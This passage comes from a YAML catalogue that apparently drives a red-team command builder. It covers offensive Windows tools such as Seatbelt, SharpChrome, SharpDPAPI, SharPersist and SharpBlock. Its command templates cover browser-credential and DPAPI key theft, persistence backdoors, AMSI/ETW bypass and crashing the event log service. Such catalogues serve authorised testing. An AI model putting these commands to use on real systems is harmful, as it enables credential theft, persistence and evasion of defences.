keywords 93 | labels: ["Recon"] 94 | mitre: "T1083" 95 | verb: '' 96 | required_flags: ["directories", "filetypes", "keywords", "contents"] 97 | optional_flags: [] 98 | 99 | 100 | - name: Search files and content by size of files 101 | labels: ["Recon"] 102 | mitre: "T1083" 103 | verb: '' 104 | required_flags: ["directories", "filetypes", "keywords", 
"maxfilesize", "contents"] 99 | optional_flags: [] 100 | -------------------------------------------------------------------------------- /commands/Seatbelt.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/Seatbelt 3 | sigmaRulesURL: https://raw.githubusercontent.com/SigmaHQ/sigma/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml 4 | name: Seatbelt 5 | languages: 6 | - name: EXE 7 | prefix: Seatbelt.exe 8 | - name: Apollo 9 | prefix: inline_assembly -Assembly "Seatbelt.exe" -Arguments " 10 | 11 | params: 12 | - name: Seatbelt commands 13 | type: label 14 | 15 | - name: SbGroup 16 | description: Specify Seatbelt recon group. 17 | default: "All" 18 | template: "-group={0}" 19 | type: select 20 | options: ["All", "User", "System", "Slack", "Chromium", "Remote", "Misc"] 21 | optional: true 22 | - name: SbCommand 23 | description: Command option for seatbelt 24 | default: "AMSIProviders" 25 | template: "{0}" 26 | type: select 27 | options: 28 | [ 29 | "AMSIProviders", 30 | "AntiVirus", 31 | "AppLocker", 32 | "ARPTable", 33 | "AuditPolicies", 34 | "AuditPolicyRegistry", 35 | "AutoRuns", 36 | "Certificates", 37 | "CertificateThumbprints", 38 | "ChromiumBookmarks", 39 | "ChromiumHistory", 40 | "ChromiumPresence", 41 | "CloudCredentials", 42 | "CloudSyncProviders", 43 | "CredEnum", 44 | "CredGuard", 45 | "dir", 46 | "DNSCache", 47 | "DotNet", 48 | "DpapiMasterKeys", 49 | "Dsregcmd", 50 | "EnvironmentPath", 51 | "EnvironmentVariables", 52 | "ExplicitLogonEvents", 53 | "ExplorerMRUs", 54 | "ExplorerRunCommands", 55 | "FileInfo", 56 | "FileZilla", 57 | "FirefoxHistory", 58 | "FirefoxPresence", 59 | "Hotfixes", 60 | "IdleTime", 61 | "IEFavorites", 62 | "IETabs", 63 | "IEUrls", 64 | "InstalledProducts", 65 | "InterestingFiles", 66 | "InterestingProcesses", 67 | "InternetSettings", 68 | "KeePass", 69 | "LAPS", 70 | "LastShutdown", 71 | "LocalGPOs", 72 | 
"LocalGroups", 73 | "LocalUsers", 74 | "LogonEvents", 75 | "LogonSessions", 76 | "LOLBAS", 77 | "LSASettings", 78 | "MappedDrives", 79 | "McAfeeConfigs", 80 | "McAfeeSiteList", 81 | "MicrosoftUpdates", 82 | "NamedPipes", 83 | "NetworkProfiles", 84 | "NetworkShares", 85 | "NTLMSettings", 86 | "OfficeMRUs", 87 | "OptionalFeatures", 88 | "OracleSQLDeveloper", 89 | "OSInfo", 90 | "OutlookDownloads", 91 | "PoweredOnEvents", 92 | "PowerShell", 93 | "PowerShellEvents", 94 | "PowerShellHistory", 95 | "Printers", 96 | "ProcessCreationEvents", 97 | "Processes", 98 | "ProcessOwners", 99 | "PSSessionSettings", 100 | "PuttyHostKeys", 101 | "PuttySessions", 102 | "RDCManFiles", 103 | "RDPSavedConnections", 104 | "RDPSessions", 105 | "RDPsettings", 106 | "RecycleBin", 107 | "reg", 108 | "RPCMappedEndpoints", 109 | "SCCM", 110 | "ScheduledTasks", 111 | "SearchIndex", 112 | "SecPackageCreds", 113 | "SecurityPackages", 114 | "Services", 115 | "SlackDownloads", 116 | "SlackPresence", 117 | "SlackWorkspaces", 118 | "SuperPutty", 119 | "Sysmon", 120 | "SysmonEvents", 121 | "TcpConnections", 122 | "TokenGroups", 123 | "TokenPrivileges", 124 | "UAC", 125 | "UdpConnections", 126 | "UserRightAssignments", 127 | "WindowsAutoLogon", 128 | "WindowsCredentialFiles", 129 | "WindowsDefender", 130 | "WindowsEventForwarding", 131 | "WindowsFirewall", 132 | "WindowsVault", 133 | "WMI", 134 | "WMIEventConsumer", 135 | "WMIEventFilter", 136 | "WMIFilterBinding", 137 | "WSUS", 138 | ] 139 | optional: true 140 | 141 | - name: Targets 142 | type: label 143 | 144 | - name: ComputerName 145 | type: text 146 | description: Remote computer name to enumerate (full FQDN or IP) 147 | template: "-computername={0}" 148 | default: comp1.example.local 149 | optional: true 150 | 151 | - name: Authentication 152 | type: label 153 | 154 | - name: Domain 155 | type: text 156 | description: Domain name 157 | template: "{0}" 158 | default: example.local 159 | optional: false 160 | - name: Username 161 | type: text 162 | 
description: Username 163 | template: "-username={Domain}\\{0}" 164 | default: User1 165 | optional: true 166 | - name: Password 167 | type: text 168 | description: Password 169 | template: "-password={0}" 170 | default: Password123 171 | optional: true 172 | 173 | - name: Output 174 | type: label 175 | 176 | - name: OutputFile 177 | type: text 178 | description: Output file path (Specifying json suffix will produce Json output) 179 | template: "-outputfile=\"{0}\"" 180 | default: C:\temp\out.txt 181 | optional: true 182 | 183 | - name: Flags 184 | type: label 185 | 186 | - name: Full 187 | type: flag 188 | description: argument prevents filtering output 189 | value: -full 190 | optional: true 191 | selected: true 192 | - name: Quiet 193 | type: flag 194 | description: Execute in quiet mode 195 | value: -q 196 | optional: true 197 | selected: false 198 | 199 | 200 | sections: 201 | - name: Self crafted command 202 | labels: ["Recon"] 203 | mitre: 'T1592' 204 | verb: '' 205 | required_flags: [] 206 | optional_flags: [SbCommand, SbGroup, ComputerName, Username, Password, OutputFile, Full, Quiet] 207 | 208 | - name: Run specific command 209 | labels: ["Recon"] 210 | mitre: 'T1592' 211 | verb: '' 212 | required_flags: [SbCommand] 213 | optional_flags: [ComputerName, Username, Password, OutputFile, Full, Quiet] 214 | 215 | - name: Run specific group of commands 216 | labels: ["Recon"] 217 | mitre: 'T1592' 218 | verb: '' 219 | required_flags: [SbGroup] 220 | optional_flags: [ComputerName, Username, Password, OutputFile, Full, Quiet] 221 | 222 | - name: Run checks on remote host 223 | labels: ["Recon"] 224 | mitre: 'T1592' 225 | verb: '' 226 | required_flags: [ComputerName] 227 | optional_flags: [SbCommand, SbGroup, Username, Password, OutputFile, Full, Quiet] 228 | 229 | - name: Run checks with credentials 230 | labels: ["Recon"] 231 | mitre: 'T1592' 232 | verb: '' 233 | required_flags: [Username, Password] 234 | optional_flags: [SbCommand, SbGroup, ComputerName, 
OutputFile, Full, Quiet] -------------------------------------------------------------------------------- /commands/SessionGopher.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/Arvanaghi/SessionGopher 3 | name: SessionGopher 4 | languages: 5 | - name: PS 6 | prefix: Invoke-SessionGopher 7 | 8 | params: 9 | - name: Target 10 | type: text 11 | description: A specific host you want to target. 12 | template: "-Target {0}" 13 | default: Server01 14 | optional: true 15 | - name: Targets 16 | type: text 17 | description: A file with a list of hosts to run SessionGopher against. 18 | template: "-iL {0}" 19 | default: .\path-to-file.txt 20 | optional: true 21 | - name: Output 22 | type: text 23 | description: Outputs the data to a folder of .csv files 24 | template: "-o {0}" 25 | default: C:\temp 26 | optional: true 27 | - name: Username 28 | type: text 29 | description: Username 30 | template: "-u {0}" 31 | default: User1 32 | optional: true 33 | - name: Password 34 | type: text 35 | description: Password 36 | template: "-p {0}" 37 | default: Password123 38 | optional: true 39 | 40 | - name: Thorough 41 | type: flag 42 | description: Searches all drives for PuTTY private key (.ppk), Remote Desktop Connection (.rdp), and RSA (.sdtid) files. 43 | value: -Thorough 44 | optional: true 45 | selected: false 46 | - name: AllDomain 47 | type: flag 48 | description: SessionGopher will query Active Directory for all domain-joined systems and run against all of them. 
49 | value: -AllDomain 50 | optional: true 51 | selected: false 52 | 53 | sections: 54 | - name: Self crafted command 55 | labels: ["Credential Access", "Creds", "NoCreds"] 56 | mitre: 'T1634' 57 | verb: '' 58 | required_flags: [] 59 | optional_flags: [Target, Targets, AllDomain, Username, Password, Output, Thorough] 60 | - name: Run locally 61 | labels: ["Credential Access"] 62 | mitre: 'T1634' 63 | verb: '' 64 | required_flags: [] 65 | optional_flags: [Thorough] 66 | - name: Run remotely against all instances in the domain 67 | labels: ["Credential Access"] 68 | mitre: 'T1634' 69 | verb: '' 70 | required_flags: [AllDomain] 71 | optional_flags: [Username, Password, Output, Thorough] 72 | - name: Run remotely against a specific target 73 | labels: ["Credential Access"] 74 | mitre: 'T1634' 75 | verb: '' 76 | required_flags: [Target] 77 | optional_flags: [Username, Password, Output, Thorough] 78 | - name: Run remotely against specific hosts (file path containing targets) 79 | labels: ["Credential Access"] 80 | mitre: 'T1634' 81 | verb: '' 82 | required_flags: [Targets] 83 | optional_flags: [Username, Password, Output, Thorough] -------------------------------------------------------------------------------- /commands/SharPersist.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/mandiant/SharPersist 3 | name: SharPersist 4 | languages: 5 | - name: EXE 6 | prefix: SharPersist.exe 7 | 8 | params: 9 | - name: Technique 10 | description: Persistence technique 11 | default: startupfolder 12 | template: "-t {0}" 13 | type: select 14 | options: [ "keepass", "reg", "schtaskbackdoor", "startupfolder", "tortoisesvn", "service", "schtask" ] 15 | optional: false 16 | - name: Method 17 | description: Method to execute 18 | default: list 19 | template: "-m {0}" 20 | type: select 21 | options: ["add", "remove", "check", "list"] 22 | optional: false 23 | - name: AddOns 24 | description: Optional Add-Ons 
25 | default: env 26 | template: "-o {0}" 27 | type: select 28 | options: ["env", "hourly", "daily", "logon"] 29 | optional: true 30 | - name: RegKeys 31 | description: Registry Keys 32 | default: logonscript 33 | template: "-k {0}" 34 | type: select 35 | options: [ "hklmrun", "hklmrunonce", "hklmrunonceex", "hkcurun", "hkcurunonce", "logonscript", "stickynotes", "userinit" ] 36 | optional: true 37 | - name: Command 38 | type: text 39 | description: Command to execute. 40 | template: "-c \"{0}\"" 41 | default: C:\Windows\System32\cmd.exe 42 | optional: true 43 | - name: Arguments 44 | type: text 45 | description: Arguments to command to execute (if applicable) 46 | template: "-a \"{0}\"" 47 | default: /c calc.exe 48 | optional: true 49 | - name: FileName 50 | type: text 51 | description: The file to create/modify 52 | template: "-f \"{0}\"" 53 | default: file_path 54 | optional: true 55 | - name: RegistryValue 56 | type: text 57 | description: Registry value to create/modify 58 | template: "-v \"{0}\"" 59 | default: TestValue 60 | optional: true 61 | - name: TaskName 62 | type: text 63 | description: Scheduled task name or service name 64 | template: "-n {0}" 65 | default: TestTask 66 | optional: true 67 | 68 | 69 | 70 | sections: 71 | - name: Self crafted command 72 | labels: [] 73 | mitre: '' 74 | verb: '' 75 | required_flags: [Technique, Method] 76 | optional_flags: [Command, Arguments, AddOns, RegKeys, FileName, RegistryValue, TaskName] 77 | - name: KeePass 78 | labels: ["Persistency"] 79 | mitre: '' 80 | verb: '-t keepass' 81 | required_flags: [Command, Arguments, FileName, Method] 82 | optional_flags: [] 83 | - name: Registry 84 | labels: [] 85 | mitre: '' 86 | verb: '-t reg' 87 | required_flags: [Command, RegKeys, Method] 88 | optional_flags: [Arguments, RegistryValue, AddOns] 89 | - name: Scheduled Task Backdoor 90 | labels: [] 91 | mitre: '' 92 | verb: '-t schtaskbackdoor' 93 | required_flags: [Command, TaskName, Method] 94 | optional_flags: [Arguments] 95 
| - name: Startup Folder 96 | labels: [] 97 | mitre: '' 98 | verb: '-t startupfolder' 99 | required_flags: [Command, FileName, Method] 100 | optional_flags: [Arguments] 101 | - name: Tortoise SVN 102 | labels: [] 103 | mitre: '' 104 | verb: '-t tortoisesvn' 105 | required_flags: [Command, Method] 106 | optional_flags: [Arguments] 107 | - name: Windows Service 108 | labels: [] 109 | mitre: '' 110 | verb: '-t service' 111 | required_flags: [Command, TaskName, Method] 112 | optional_flags: [Arguments] 113 | - name: Scheduled Task 114 | labels: [] 115 | mitre: '' 116 | verb: '-t schtask' 117 | required_flags: [Command, TaskName, Method] 118 | optional_flags: [Arguments, AddOns] -------------------------------------------------------------------------------- /commands/SharpBlock.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/CCob/SharpBlock 3 | name: SharpBlock 4 | languages: 5 | - name: EXE 6 | prefix: SharpBlock.exe 7 | 8 | params: 9 | - name: Program 10 | type: text 11 | description: Program to execute, can be remote path. 12 | template: "-e \"{0}\"" 13 | default: C:\Windows\System32\cmd.exe 14 | optional: false 15 | - name: Arguments 16 | type: text 17 | description: Arguments for program. 18 | template: "-a \"{0}\"" 19 | default: 20 | optional: true 21 | - name: BlockDLLs 22 | type: text 23 | description: Name of DLL to block. (for multiple dlls need to use this flag multiple times) 24 | template: "-n \"{0}\"" 25 | default: 26 | optional: true 27 | - name: BlockCopyright 28 | type: text 29 | description: Copyright string to block. 30 | template: "-c \"{0}\"" 31 | default: 32 | optional: true 33 | - name: BlockProduct 34 | type: text 35 | description: Product string to block. 36 | template: "-p \"{0}\"" 37 | default: 38 | optional: true 39 | - name: BlockDescription 40 | type: text 41 | description: Description string to block. 
42 | template: "-d \"{0}\"" 43 | default: 44 | optional: true 45 | - name: SpawnProcess 46 | type: text 47 | description: Host process to spawn for swapping with the target exe. 48 | template: "-s {0}" 49 | default: chrome.exe 50 | optional: true 51 | - name: PPID 52 | type: text 53 | description: Parent process ID for spawned child (PPID Spoofing) 54 | template: "--ppid={0}" 55 | default: 4 56 | optional: true 57 | 58 | - name: Show 59 | type: flag 60 | description: Show the launched process window instead of hiding it (the default) 61 | value: "-w" 62 | optional: true 63 | selected: false 64 | - name: DisableBypassAMSI 65 | type: flag 66 | description: Disable AMSI bypass 67 | value: --disable-bypass-amsi 68 | optional: true 69 | selected: false 70 | - name: DisableBypassCmd 71 | type: flag 72 | description: Disable command line bypass 73 | value: --disable-bypass-cmdline 74 | optional: true 75 | selected: false 76 | - name: DisableBypassETW 77 | type: flag 78 | description: Disable ETW bypass 79 | value: --disable-bypass-etw 80 | optional: true 81 | selected: false 82 | - name: DisableHeaderPatch 83 | type: flag 84 | description: Disable process hollow detection bypass 85 | value: --disable-header-patch 86 | optional: true 87 | selected: false 88 | 89 | sections: 90 | - name: Self crafted command 91 | labels: ["Execution", "Evasion"] 92 | mitre: 'T1562' 93 | verb: '' 94 | required_flags: [Program] 95 | optional_flags: [Arguments, SpawnProcess, PPID, BlockDLLs, BlockCopyright, BlockProduct, BlockDescription, Show, DisableBypassAMSI, DisableBypassCmd, DisableBypassETW, DisableHeaderPatch] 96 | 97 | - name: Execute assembly with arguments and bypasses 98 | labels: ["Execution", "Evasion"] 99 | mitre: "T1564.010" 100 | verb: '' 101 | required_flags: [Program] 102 | optional_flags: [Arguments, Show, DisableBypassAMSI, DisableBypassCmd, DisableBypassETW, DisableHeaderPatch] 103 | - name: Execute assembly, with blocking rules 104 | labels: ["Execution", "Evasion"] 105 | 
mitre: 'T1562' 106 | verb: '' 107 | required_flags: [Program] 108 | optional_flags: [Arguments, BlockDLLs, BlockCopyright, BlockProduct, BlockDescription, Show, DisableBypassAMSI, DisableBypassCmd, DisableBypassETW, DisableHeaderPatch] 109 | - name: Spawn process and execute assembly 110 | labels: ["Execution", "Evasion"] 111 | mitre: 'T1055.012' 112 | verb: '' 113 | required_flags: [Program, SpawnProcess] 114 | optional_flags: [Arguments, BlockDLLs, BlockCopyright, BlockProduct, BlockDescription, Show, DisableBypassAMSI, DisableBypassCmd, DisableBypassETW, DisableHeaderPatch] 115 | - name: Execute assembly with PID spoofing 116 | labels: ["Execution", "Evasion"] 117 | mitre: 'T1134.004' 118 | verb: '' 119 | required_flags: [Program, PPID] 120 | optional_flags: [Arguments, BlockDLLs, BlockCopyright, BlockProduct, BlockDescription, Show, DisableBypassAMSI, DisableBypassCmd, DisableBypassETW, DisableHeaderPatch] 121 | -------------------------------------------------------------------------------- /commands/SharpChrome.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/SharpDPAPI 3 | name: SharpChrome 4 | languages: 5 | - name: EXE 6 | prefix: SharpChrome.exe 7 | - name: Apollo 8 | prefix: inline_assembly -Assembly "SharpChrome.exe" -Arguments " 9 | 10 | params: 11 | - name: Targeting 12 | type: label 13 | 14 | - name: server 15 | description: Target server to interact with 16 | template: "/server:{0}" 17 | default: '' 18 | type: text 19 | optional: true 20 | - name: target 21 | description: Triage a specific 'Cookies', 'Login Data', 'Local State' location or specific user folder 22 | template: "/target:{0}" 23 | default: '' 24 | type: text 25 | optional: true 26 | - name: browser 27 | description: 'Triage chrome (the default) or (chromium-based) edge' 28 | template: "/browser:{0}" 29 | default: chrome 30 | type: select 31 | options: [chrome,edge] 32 | optional: true 33 | 
selected: false 34 | 35 | - name: Decryption 36 | type: label 37 | 38 | - name: unprotect 39 | description: Force use of CryptUnprotectData() (default for unprivileged execution) 40 | type: flag 41 | value: "/unprotect" 42 | 43 | - name: pvk 44 | type: text 45 | description: DPAPI domain private key file/Base64 to decrypt reachable user masterkeys 46 | template: "/pvk:{0}" 47 | default: 'key.pvk' 48 | optional: true 49 | 50 | - name: password 51 | description: Decrypt the current user's masterkeys using a plaintext password 52 | type: text 53 | template: "/password:{0}" 54 | optional: true 55 | 56 | - name: guid-sha 57 | type: text 58 | description: 'One or more GUID:SHA1 masterkeys for decryption of discovered DPAPI blobs' 59 | template: "{0}" 60 | default: '{44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687' 61 | optional: true 62 | selected: false 63 | 64 | - name: mkfile 65 | description: Use a file of one or more GUID:SHA1 masterkeys for decryption 66 | type: text 67 | template: "/mkfile:{0}" 68 | optional: true 69 | 70 | - name: statekey 71 | description: Decrypted AES state key (from the 'statekeys' command) 72 | type: text 73 | template: "/mkfile:{0}" 74 | optional: true 75 | 76 | - name: Output 77 | type: label 78 | 79 | - name: nowrap 80 | description: Disable backupkey base64 output value line wrapping 81 | value: "/nowrap" 82 | type: flag 83 | optional: true 84 | 85 | - name: file 86 | type: text 87 | description: Output file for the PVK for 'backupkey' command 88 | template: "/file:{0}" 89 | default: 'key.pvk' 90 | optional: true 91 | 92 | - name: format 93 | description: 'Choose how to display the output. 
JSON available only for cookies command' 94 | template: "/format:{0}" 95 | default: chrome 96 | type: select 97 | options: [csv,table,json] 98 | optional: true 99 | selected: false 100 | 101 | - name: showall 102 | description: Show Login Data entries with null passwords and expired Cookies instead of filtering 103 | value: "/showall" 104 | type: flag 105 | optional: true 106 | 107 | - name: consoleoutfile 108 | type: text 109 | description: Output all console output to a file on disk 110 | template: "/consoleoutfile:{0}" 111 | default: 'consoleout.txt' 112 | optional: true 113 | 114 | - name: setneverexpire 115 | description: Set expirations for cookies output to now + 100 years (for json output) 116 | value: "/setneverexpire" 117 | type: flag 118 | optional: true 119 | 120 | - name: Cookies filtering 121 | type: label 122 | 123 | - name: cookie 124 | type: text 125 | description: Return cookies where the cookie name matches the supplied regex 126 | template: "/cookie:{0}" 127 | default: 'login' 128 | optional: true 129 | 130 | - name: url 131 | type: text 132 | description: Return cookies where the cookie URL matches the supplied regex 133 | template: "/url:{0}" 134 | default: 'login.microsoftonline.com' 135 | optional: true 136 | 137 | 138 | sections: 139 | - name: Get domain backup key as Base64 string # SharpChrome backupkey /nowrap /server:{{DomainController}} file:{{Path}} 140 | labels: ["Credential Access"] 141 | mitre: '' 142 | verb: 'backupkey' 143 | required_flags: [] 144 | optional_flags: [server, nowrap, file] 145 | - name: Get browser saved logins # SharpChrome.exe logins /server:{{Server}} 146 | labels: ["Credential Access"] 147 | mitre: '' 148 | verb: 'logins' 149 | required_flags: [] 150 | optional_flags: [ 151 | target, server, browser, 152 | unprotect, password, guid-sha, mkfile, pvk, statekey, 153 | format, showall, consoleoutfile 154 | ] 155 | - name: Get browser cookies 156 | labels: ["Credential Access"] 157 | mitre: '' 158 | verb: 'cookies' 
159 | required_flags: [] 160 | optional_flags: [ 161 | target, server, browser, 162 | unprotect, password, guid-sha, mkfile, pvk, statekey, 163 | cookie, url, setneverexpire, # Cookies command only 164 | format, showall, consoleoutfile 165 | ] 166 | - name: Get the browser's statekey 167 | labels: ["Credential Access"] 168 | mitre: '' 169 | verb: 'statekeys' 170 | required_flags: [] 171 | optional_flags: [ 172 | target, server, browser, 173 | unprotect, password, guid-sha, mkfile, pvk, statekey, 174 | format, showall, consoleoutfile 175 | ] -------------------------------------------------------------------------------- /commands/SharpClipboard.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/slyd0g/SharpClipboard 3 | name: SharpClipboard 4 | languages: 5 | - name: EXE 6 | prefix: SharpClipboard.exe 7 | 8 | params: 9 | 10 | sections: 11 | - name: Monitor Clipboard 12 | labels: ["Lateral", "Creds", "Clipboard"] 13 | mitre: '' 14 | verb: '' 15 | required_flags: [] 16 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpCloud.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/chrismaddalena/SharpCloud 3 | name: SharpCloud 4 | languages: 5 | - name: EXE 6 | prefix: SharpCloud.exe 7 | 8 | params: 9 | - name: SCOption 10 | description: SharpCloud param 11 | default: all 12 | template: "{0}" 13 | type: select 14 | options: ["all", "aws", "azure", "gcloud"] 15 | optional: false 16 | 17 | sections: 18 | - name: Search for cloud service credentials 19 | labels: ["Recon"] 20 | mitre: 'T1589.001' 21 | verb: '' 22 | required_flags: [SCOption] 23 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpCrashEventLog.yaml: 
-------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/slyd0g/SharpCrashEventLog 3 | name: SharpCrashEventLog 4 | languages: 5 | - name: EXE 6 | prefix: SharpCrashEventLog 7 | 8 | params: 9 | - name: Target 10 | type: text 11 | description: Target server or workstation 12 | template: "\\\\{0}" 13 | default: localhost 14 | optional: false 15 | 16 | sections: 17 | - name: Crash the target computer's event log service 18 | labels: ["Execution", "Evasion"] 19 | mitre: 'T1562.002' 20 | verb: '' 21 | required_flags: [Target] 22 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpDPAPI.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/GhostPack/SharpDPAPI 3 | name: SharpDPAPI 4 | languages: 5 | - name: EXE 6 | prefix: 'SharpDPAPI.exe' 7 | - name: C2 8 | prefix: 'execute-assembly /path/to/local/SharpDPAPI.exe' 9 | 10 | params: 11 | - name: Decryption Keys 12 | type: label 13 | 14 | - name: pvk 15 | type: text 16 | description: DPAPI domain private key file/Base64 to decrypt reachable user masterkeys 17 | template: "/pvk:{0}" 18 | default: 'key.pvk' 19 | optional: false 20 | 21 | - name: password 22 | type: text 23 | description: User's plain-text password to decrypt the current user's discovered masterkeys 24 | template: "/password:{0}" 25 | default: '' 26 | optional: false 27 | 28 | - name: guid-sha 29 | type: text 30 | description: 'One or more GUID:SHA1 masterkeys for decryption of discovered DPAPI blobs' 31 | template: "{0}" 32 | default: '{44ca9f3a-9097-455e-94d0-d91de951c097}:9b049ce6918ab89937687' 33 | optional: true 34 | selected: false 35 | 36 | - name: mkfile 37 | type: text 38 | description: 'A file of one or more GUID:SHA1 masterkeys for decryption of discovered DPAPI blobs' 39 | template: "/mkfile:{0}" 40 | default: 'masterkeys.txt' 41 | optional: 
true 42 | selected: false 43 | 44 | - name: Target 45 | type: label 46 | 47 | - name: server 48 | type: text 49 | description: 'Domain Controller server to target' 50 | template: "/server:{0}" 51 | default: 'dc.domain.local' 52 | optional: true 53 | selected: false 54 | 55 | - name: target 56 | type: text 57 | description: 'File/Folder to target for the operation' 58 | template: "/target:{0}" 59 | default: 60 | optional: true 61 | selected: false 62 | 63 | - name: type 64 | description: 'Type of objects for the search command' 65 | default: 66 | template: "/type:{0}" 67 | type: select 68 | options: ['registry', 'folder', 'file', 'base64'] 69 | optional: false 70 | 71 | - name: path 72 | type: text 73 | description: 'Optional path to focus the search (syntax depends on the type)' 74 | template: "/path:{0}" 75 | default: 'C:\path\to\file' 76 | optional: true 77 | selected: true 78 | 79 | - name: Filter 80 | type: label 81 | 82 | - name: maxBytes 83 | type: text 84 | description: 'Maximum file size to filter for the search command' 85 | template: "/maxBytes:{0}" 86 | default: '16000' 87 | optional: true 88 | selected: false 89 | 90 | - name: base 91 | type: text 92 | description: 'Base64 string to filter for the search command' 93 | template: "/base:{0}" 94 | default: '' 95 | optional: true 96 | selected: false 97 | 98 | - name: Output 99 | type: label 100 | 101 | - name: file 102 | type: text 103 | description: 'Path to output file' 104 | template: "/file:{0}" 105 | default: 'key.pvk' 106 | optional: true 107 | selected: false 108 | 109 | - name: Flags 110 | type: label 111 | 112 | - name: unprotect 113 | type: flag 114 | description: 'Force use of CryptUnprotectData() for ps, rdg, or blob commands' 115 | value: '/unprotect' 116 | optional: true 117 | selected: false 118 | 119 | - name: showall 120 | type: flag 121 | description: 'Show all decrypted private key files, not just ones that are linked to installed certs (the default)' 122 | value: '/showall' 123 | 
optional: true 124 | selected: false 125 | 126 | - name: machine 127 | type: flag 128 | description: 'Use the local machine store for certificate triage' 129 | value: '/machine' 130 | optional: true 131 | selected: false 132 | 133 | - name: Display Flags 134 | type: label 135 | 136 | - name: nowrap 137 | description: 'Do not wrap the lines of the displayed base64 keys' 138 | optional: true 139 | selected: false 140 | type: flag 141 | value: '/nowrap' 142 | 143 | - name: showErrors 144 | type: flag 145 | description: Show errors 146 | value: '/showErrors' 147 | optional: true 148 | selected: false 149 | 150 | 151 | sections: 152 | - name: 'Retrieve a domain controller DPAPI backup key, optionally specifying a DC and output file' 153 | labels: ['Credential Access'] 154 | mitre: '' 155 | verb: 'backupkey' 156 | required_flags: [] 157 | optional_flags: [nowrap, server, file] 158 | 159 | - name: 'Triage user Masterkey files' 160 | labels: ['Credential Access'] 161 | mitre: '' 162 | verb: 'masterkeys' 163 | required_flags: [pvk] 164 | optional_flags: [server, target, password] 165 | 166 | - name: 'Search and decrypt Credential files for all users by providing masterkey GUID:SHA' 167 | labels: ['Credential Access'] 168 | mitre: 'T1555.004' 169 | verb: 'credentials' 170 | required_flags: [guid-sha] 171 | optional_flags: [guid-sha, unprotect, mkfile, showall, machine, password, server, target] 172 | 173 | - name: 'Search and decrypt Credential files for all users by providing the domain backup key' 174 | labels: ['Credential Access'] 175 | mitre: 'T1555.004' 176 | verb: 'credentials' 177 | required_flags: [pvk] 178 | optional_flags: [guid-sha, unprotect, mkfile, showall, machine, password, server, target] 179 | 180 | - name: 'Search for KeePass ProtectedUserKey.bin files for the current user (or if elevated, all users), and decrypt them' 181 | labels: ['Credential Access'] 182 | mitre: 'T1555.005' 183 | verb: 'keepass' 184 | required_flags: [unprotect] 185 | optional_flags: 
[password, guid-sha, mkfile, pvk] 186 | 187 | - name: 'Search user-encrypted DPAPI certificate private keys, and decrypt them using the domain backup key' 188 | labels: [] 189 | mitre: '' 190 | verb: 'certificates' 191 | required_flags: [pvk] 192 | optional_flags: [mkfile, target, pvk, server, password, machine, showall] 193 | 194 | - name: 'Elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret and decrypt any found machine DPAPI masterkeys' 195 | labels: [] 196 | mitre: 'T1003.004' 197 | verb: 'machinemasterkeys' 198 | required_flags: [] 199 | optional_flags: [] 200 | 201 | - name: 'Elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret, decrypt any found machine DPAPI masterkeys, and triage machine Credential files and Vaults' 202 | labels: ['Credential Access'] 203 | mitre: '' 204 | verb: 'machinetriage' 205 | required_flags: [] 206 | optional_flags: [] 207 | 208 | 209 | - name: 'Use the machine certificate store to look for decryptable machine certificate private keys' 210 | labels: [] 211 | mitre: '' 212 | verb: 'certificates' 213 | required_flags: [machine] 214 | optional_flags: [target, mkfile, showall] 215 | 216 | - name: 'Describe/decrypt a DPAPI blob' 217 | labels: [] 218 | mitre: '' 219 | verb: 'blob' 220 | required_flags: [target, unprotect] 221 | optional_flags: [pvk] 222 | 223 | - name: 'Search for potential DPAPI blobs in the registry / files / folders or base64 blobs' 224 | labels: [] 225 | mitre: '' 226 | verb: 'search' 227 | required_flags: [type] 228 | optional_flags: [path, base, maxBytes, showErrors] -------------------------------------------------------------------------------- /commands/SharpEDRChecker.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/PwnDexter/SharpEDRChecker 3 | name: SharpEDRChecker 4 | languages: 5 | - name: EXE 6 | prefix: SharpEDRChecker.exe 7 | 8 | params: 9 | 10 | 11 | sections: 12 | - name: EDR reconnaissance on local host 13 | 
labels: ["Recon"] 14 | mitre: '' 15 | verb: '' 16 | required_flags: [] 17 | optional_flags: [] -------------------------------------------------------------------------------- /commands/SharpFinder.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | projectLink: https://github.com/s0lst1c3/SharpFinder 3 | name: SharpFinder 4 | languages: 5 | - name: EXE 6 | prefix: SharpFinder.exe 7 | 8 | params: 9 | - name: Path 10 | type: text 11 | description: Path to single directory for enumeration 12 | template: "--path={0}" 13 | default: \\Remote\C$ 14 | optional: true 15 | - name: InputFile 16 | type: text 17 | description: File path containing list of directories 18 | template: "--input-file={0}" 19 | default: directory-list.txt 20 | optional: true 21 | - name: Keywords 22 | type: text 23 | description: Keywords used to filter files by name. 24 | template: "--keywords={0}" 25 | default: creds,credential,admin,password 26 | optional: true 27 | - name: Extensions 28 | type: text 29 | description: Extensions used to filter files by type. 
